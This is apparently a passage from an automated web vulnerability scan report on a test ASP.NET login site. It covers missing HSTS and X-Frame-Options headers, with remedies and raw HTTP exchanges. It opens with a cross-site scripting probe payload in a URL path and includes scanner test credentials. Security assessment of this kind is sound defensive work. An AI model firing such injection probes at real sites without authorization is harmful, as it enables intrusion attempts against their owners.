
Parameter Type Value
URI-BASED Full URL '"--></style></scRipt><scRipt>pentestonline.es(0x00041F)</scRipt>

Certainty

Request

GET /Resources/images/'%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Epentestonline.es(0x00041F)%3C/scRipt%3E HTTP/1.1
Host: test.q2bstudio.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: ASP.NET_SessionId=54c5dwctoptf0vzaryw3rymi; q2blng=ca-ES
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
X-Scanner: pentestonline.es

Response



and location of the exception can be identified using the exception stack trace below.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>


[HttpException (0x80004005): A potentially dangerous Request.Path value was detected from the client (&gt;).]
System.Web.HttpRequest.ValidateInputIfRequiredByConfig() +11981012
System.Web.

11. HTTP Strict Transport Security (HSTS) Policy Not Enabled

1 TOTAL
LOW

pentestonline.es identified that HTTP Strict Transport Security (HSTS) policy is not enabled.

The target website is being served from not only HTTP but also HTTPS and it lacks of HSTS policy implementation.

HTTP Strict Transport Security (HSTS) is a web security policy mechanism whereby a web server declares that complying user agents (such as a web browser) are to interact with it using only secure HTTP (HTTPS) connections. The HSTS Policy is communicated by the server to the user agent via a HTTP response header field named "Strict-Transport-Security". HSTS Policy specifies a period of time during which the user agent shall access the server in only secure fashion.

When a web application issues HSTS Policy to user agents, conformant user agents behave as follows:
  • Automatically turn any insecure links referencing the web application into secure links. (For instance, http://example.com/some/page/ will be modified to https://example.com/some/page/ before accessing the server.)
  • If the security of the connection cannot be ensured (e.g. the server's TLS certificate is self-signed), show an error message and do not allow the user to access the web application.

Remedy

Configure your webserver to redirect HTTP requests to HTTPS.

For Apache, you should have modification in the httpd.conf.

# load module
LoadModule headers_module modules/mod_headers.so
 
# redirect all HTTP to HTTPS (optional)
<VirtualHost *:80>
       ServerAlias *
       RewriteEngine On
       RewriteRule ^(.*)$ https://%{HTTP_HOST}$1 [redirect=301]
</VirtualHost>
 
# HTTPS-Host-Configuration
<VirtualHost *:443>
      # Use HTTP Strict Transport Security to force client to use secure connections only
      Header always set Strict-Transport-Security "max-age=31536000; includeSubDomains"
 
      # Further Configuration goes here
      [...]
</VirtualHost>

External References

Classification

OWASP 2017-A3

11.1. https://test.q2bstudio.com/

https://test.q2bstudio.com/

Certainty

Request

GET / HTTP/1.1
Host: test.q2bstudio.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
X-Scanner: pentestonline.es

Response

HTTP/1.1 200 OK
Set-Cookie: ASP.NET_SessionId=n0egufsn4tyjxxhhywqdq43k; path=/; HttpOnly
Set-Cookie: q2blng=ca-ES; expires=Wed, 05-Feb-2020 12:43:33 GMT; path=/
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 3260
Content-Type: text/html; charset=utf-8
Content-Encoding:
Date: Wed, 29 Jan 2020 12:43:33 GMT
Cache-Control: private



<!DOCTYPE html>
<!--[if IE 8]> <html class="ie8"> <![endif]-->
<!--[if IE 9]> <html class="ie9 gt-ie8"> <![endif]-->
<!--[if gt IE 9]><!-->
<html class="gt-ie8 gt-ie9 not-ie">
<!--<![endif]-->
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<title>Login</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no, minimum-scale=1.0, maximum-scale=1.0">
<link rel="shortcut icon" href="Resources/logo/logo_vc.png" />
<!-- Open Sans font from Google CDN -->
<link href="http://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,400,600,700,300&subset=latin" rel="stylesheet" type="text/css">

<!-- Pixel Admin's stylesheets -->
<link href="assets/stylesheets/bootstrap.min.css" rel="stylesheet" type="text/css">
<link href="assets/stylesheets/pixel-admin.min.css" rel="stylesheet" type="text/css">
<link href="assets/stylesheets/pages.min.css" rel="stylesheet" type="text/css">
<link href="assets/stylesheets/rtl.min.css" rel="stylesheet" type="text/css">
<link href="assets/stylesheets/themes.min.css" rel="stylesheet" type="text/css">

<!-- Get jQuery from Google CDN -->
<!--[if !IE]> -->
<script type="text/javascript"> window.jQuery || document.write('<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js">' + "<" + "/script>"); </script>
<!-- <![endif]-->
<!--[if lte IE 9]>
<script type="text/javascript"> window.jQuery || document.write('<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js">'

12. Missing X-Frame-Options Header

11 TOTAL
LOW

pentestonline.es detected a missing X-Frame-Options header which means that this website could be at risk of a clickjacking attack.

The X-Frame-Options HTTP header field indicates a policy that specifies whether the browser should render the transmitted resource within a frame or an iframe. Servers can declare this policy in the header of their HTTP responses to prevent clickjacking attacks, which ensures that their content is not embedded into other pages or frames.

Impact

Clickjacking is when an attacker uses multiple transparent or opaque layers to trick a user into clicking on a button or link on a framed page when they were intending to click on the top level page. Thus, the attacker is "hijacking" clicks meant for their page and routing them to other another page, most likely owned by another application, domain, or both.

Using a similar technique, keystrokes can also be hijacked. With a carefully crafted combination of stylesheets, iframes, and text boxes, a user can be led to believe they are typing in the password to their email or bank account, but are instead typing into an invisible frame controlled by the attacker.

Remedy

  • Sending the proper X-Frame-Options in HTTP response headers that instruct the browser to not allow framing from other domains.
    • X-Frame-Options: DENY  It completely denies to be loaded in frame/iframe.
    • X-Frame-Options: SAMEORIGIN It allows only if the site which wants to load has a same origin.
    • X-Frame-Options: ALLOW-FROM URL It grants a specific URL to load itself in a iframe. However please pay attention to that, not all browsers support this.
  • Employing defensive code in the UI to ensure that the current frame is the most top level window.

External References

Remedy References

Classification

OWASP 2017-A6

12.1. http://test.q2bstudio.com/

http://test.q2bstudio.com/

Certainty

Request

GET / HTTP/1.1
Host: test.q2bstudio.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
X-Scanner: pentestonline.es

Response

HTTP/1.1 200 OK
Set-Cookie: ASP.NET_SessionId=54c5dwctoptf0vzaryw3rymi; path=/; HttpOnly
Set-Cookie: q2blng=ca-ES; expires=Wed, 05-Feb-2020 12:43:22 GMT; path=/
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 3261
Content-Type: text/html; charset=utf-8
Content-Encoding:
Date: Wed, 29 Jan 2020 12:43:22 GMT
Cache-Control: private



<!DOCTYPE html>
<!--[if IE 8]> <html class="ie8"> <![endif]-->
<!--[if IE 9]> <html class="ie9 gt-ie8"> <![endif]-->
<!--[if gt IE 9]><!-->
<html class="gt-ie8 gt-ie9 not-ie">
<!--<![endif]-->
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<title>Login</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no, minimum-scale=1.0, maximum-scale=1.0">
<link rel="shortcut icon" href="Resources/logo/logo_vc.png" />
<!-- Open Sans font from Google CDN -->
<link href="http://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,400,600,700,300&subset=latin" rel="stylesheet" type="text/css">

<!-- Pixel Admin's stylesheets -->
<link href="assets/stylesheets/bootstrap.min.css" rel="stylesheet" type="text/css">
<link href="assets/stylesheets/pixel-admin.min.css" rel="stylesheet" type="text/css">
<link href="assets/stylesheets/pages.min.css" rel="stylesheet" type="text/css">
<link href="assets/stylesheets/rtl.min.css" rel="stylesheet" type="text/css">
<link href="assets/stylesheets/themes.min.css" rel="stylesheet" type="text/css">

<!-- Get jQuery from Google CDN -->
<!--[if !IE]> -->
<script type="text/javascript"> window.jQuery || document.write('<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js">' + "<" + "/script>"); </script>
<!-- <![endif]-->
<!--[if lte IE 9]>
<script type="text/javascript"> window.jQuery || document.write('<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js">'

12.2. http://test.q2bstudio.com/assets/javascripts/

http://test.q2bstudio.com/assets/javascripts/

Certainty

Request

GET /assets/javascripts/ HTTP/1.1
Host: test.q2bstudio.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: ASP.NET_SessionId=54c5dwctoptf0vzaryw3rymi; q2blng=ca-ES
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
X-Scanner: pentestonline.es

Response

HTTP/1.1 403 Forbidden
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Content-Length: 1233
Content-Type: text/html
Date: Wed, 29 Jan 2020 12:43:32 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>403 - Forbidden: Access is denied.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;}
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;}
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>403 - Forbidden: Access is denied.</h2>
<h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3>
</fieldset></div>
</div>
</body>
</html>

12.3. http://test.q2bstudio.com/Resources/logo/

http://test.q2bstudio.com/Resources/logo/

Certainty

Request

GET /Resources/logo/ HTTP/1.1
Host: test.q2bstudio.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: ASP.NET_SessionId=54c5dwctoptf0vzaryw3rymi; q2blng=ca-ES
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
X-Scanner: pentestonline.es

Response

HTTP/1.1 403 Forbidden
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Content-Length: 1233
Content-Type: text/html
Date: Wed, 29 Jan 2020 12:43:32 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>403 - Forbidden: Access is denied.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;}
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;}
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>403 - Forbidden: Access is denied.</h2>
<h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3>
</fieldset></div>
</div>
</body>
</html>

12.4. http://test.q2bstudio.com/assets/stylesheets/

http://test.q2bstudio.com/assets/stylesheets/

Certainty

Request

GET /assets/stylesheets/ HTTP/1.1
Host: test.q2bstudio.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: ASP.NET_SessionId=54c5dwctoptf0vzaryw3rymi; q2blng=ca-ES
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
X-Scanner: pentestonline.es

Response

HTTP/1.1 403 Forbidden
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Content-Length: 1233
Content-Type: text/html
Date: Wed, 29 Jan 2020 12:43:32 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>403 - Forbidden: Access is denied.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;}
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;}
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>403 - Forbidden: Access is denied.</h2>
<h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3>
</fieldset></div>
</div>
</body>
</html>

12.5. http://test.q2bstudio.com/assets/

http://test.q2bstudio.com/assets/

Certainty

Request

GET /assets/ HTTP/1.1
Host: test.q2bstudio.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: ASP.NET_SessionId=54c5dwctoptf0vzaryw3rymi; q2blng=ca-ES
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
X-Scanner: pentestonline.es

Response

HTTP/1.1 403 Forbidden
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Content-Length: 1233
Content-Type: text/html
Date: Wed, 29 Jan 2020 12:43:32 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>403 - Forbidden: Access is denied.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;}
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;}
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>403 - Forbidden: Access is denied.</h2>
<h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3>
</fieldset></div>
</div>
</body>
</html>

12.6. http://test.q2bstudio.com/assets/demo/themes/

http://test.q2bstudio.com/assets/demo/themes/

Certainty

Request

GET /assets/demo/themes/ HTTP/1.1
Host: test.q2bstudio.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: ASP.NET_SessionId=54c5dwctoptf0vzaryw3rymi; q2blng=ca-ES
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
X-Scanner: pentestonline.es

Response

HTTP/1.1 403 Forbidden
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Content-Length: 1233
Content-Type: text/html
Date: Wed, 29 Jan 2020 12:43:32 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>403 - Forbidden: Access is denied.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;}
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;}
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>403 - Forbidden: Access is denied.</h2>
<h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3>
</fieldset></div>
</div>
</body>
</html>

12.7. http://test.q2bstudio.com/assets/demo/

http://test.q2bstudio.com/assets/demo/

Certainty

Request

GET /assets/demo/ HTTP/1.1
Host: test.q2bstudio.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: ASP.NET_SessionId=54c5dwctoptf0vzaryw3rymi; q2blng=ca-ES
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
X-Scanner: pentestonline.es

Response

HTTP/1.1 403 Forbidden
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Content-Length: 1233
Content-Type: text/html
Date: Wed, 29 Jan 2020 12:43:32 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>403 - Forbidden: Access is denied.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;}
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;}
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>403 - Forbidden: Access is denied.</h2>
<h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3>
</fieldset></div>
</div>
</body>
</html>

12.8. http://test.q2bstudio.com/Resources/

http://test.q2bstudio.com/Resources/

Certainty

Request

GET /Resources/ HTTP/1.1
Host: test.q2bstudio.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: ASP.NET_SessionId=54c5dwctoptf0vzaryw3rymi; q2blng=ca-ES
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
X-Scanner: pentestonline.es

Response

HTTP/1.1 403 Forbidden
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Content-Length: 1233
Content-Type: text/html
Date: Wed, 29 Jan 2020 12:43:32 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>403 - Forbidden: Access is denied.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;}
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;}
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>403 - Forbidden: Access is denied.</h2>
<h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3>
</fieldset></div>
</div>
</body>
</html>

12.9. http://test.q2bstudio.com/Resources/images/

http://test.q2bstudio.com/Resources/images/

Certainty

Request

GET /Resources/images/ HTTP/1.1
Host: test.q2bstudio.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: ASP.NET_SessionId=54c5dwctoptf0vzaryw3rymi; q2blng=ca-ES
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
X-Scanner: pentestonline.es

Response

HTTP/1.1 403 Forbidden
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Content-Length: 1233
Content-Type: text/html
Date: Wed, 29 Jan 2020 12:43:32 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>403 - Forbidden: Access is denied.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;}
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;}
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
<div class="content-container"><fieldset>
<h2>403 - Forbidden: Access is denied.</h2>
<h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3>
</fieldset></div>
</div>
</body>
</html>

12.10. http://test.q2bstudio.com/trace.axd

http://test.q2bstudio.com/trace.axd

Certainty

Request

GET /trace.axd HTTP/1.1
Host: test.q2bstudio.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: ASP.NET_SessionId=54c5dwctoptf0vzaryw3rymi; q2blng=ca-ES
Referer: http://test.q2bstudio.com/trace.axd
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
X-Scanner: pentestonline.es

Response

HTTP/1.1 403 Forbidden
X-Powered-By: ASP.NET
Content-Length: 3400
Content-Type: text/html; charset=utf-8
Date: Wed, 29 Jan 2020 12:43:33 GMT
Cache-Control: private

<!DOCTYPE html>
<html>
<head>
<title>Trace Error</title>
<meta name="viewport" content="width=device-width" />
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Consolas","Lucida Console",Monospace;font-size:11pt;margin:0;padding:0.5em;line-height:14pt}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
@media screen and (max-width: 639px) {
pre { width: 440px; overflow: auto; white-space: pre-wrap; word-wrap: break-word; }
}
@media screen and (max-width: 479px) {
pre { width: 280px; }
}
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>Trace Error</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>The current trace settings prevent trace.axd from being viewed remotely (for security reasons). It could, however, be viewed by browsers running on the local server machine.
<br><br>

<b>Details:</b> To enable trace.axd to be viewable on remote machines, please create a &lt;tra

12.11. http://test.q2bstudio.com/

http://test.q2bstudio.com/

Certainty

Request

POST / HTTP/1.1
Host: test.q2bstudio.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 160
Content-Type: application/x-www-form-urlencoded
Cookie: ASP.NET_SessionId=54c5dwctoptf0vzaryw3rymi; q2blng=ca-ES
Referer: http://test.q2bstudio.com/
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
X-Scanner: pentestonline.es

btnResetPass=%c2%bfOlvidaste+tu+contrase%c3%b1a%3f&username_id=Smith&__VIEWSTATE=IL&__VIEWSTATE_KEY=VS_52.143.173.9_637159022021935337&password_id=N3tsp%40rker-

Response

HTTP/1.1 200 OK
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 3216
Content-Type: text/html; charset=utf-8
Content-Encoding:
Date: Wed, 29 Jan 2020 12:43:32 GMT
Cache-Control: private



<!DOCTYPE html>
<!--[if IE 8]> <html class="ie8"> <![endif]-->
<!--[if IE 9]> <html class="ie9 gt-ie8"> <![endif]-->
<!--[if gt IE 9]><!-->
<html class="gt-ie8 gt-ie9 not-ie">
<!--<![endif]-->
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<title>Login</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no, minimum-scale=1.0, maximum-scale=1.0">
<link rel="shortcut icon" href="Resources/logo/logo_vc.png" />
<!-- Open Sans font from Google CDN -->
<link href="http://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,400,600,700,300&subset=latin" rel="stylesheet" type="text/css">

<!-- Pixel Admin's stylesheets -->
<link href="assets/stylesheets/bootstrap.min.css" rel="stylesheet" type="text/css">
<link href="assets/stylesheets/pixel-admin.min.css" rel="stylesheet" type="text/css">
<link href="assets/stylesheets/pages.min.css" rel="stylesheet" type="text/css">
<link href="assets/stylesheets/rtl.min.css" rel="stylesheet" type="text/css">
<link href="assets/stylesheets/themes.min.css" rel="stylesheet" type="text/css">

<!-- Get jQuery from Google CDN -->
<!--[if !IE]> -->
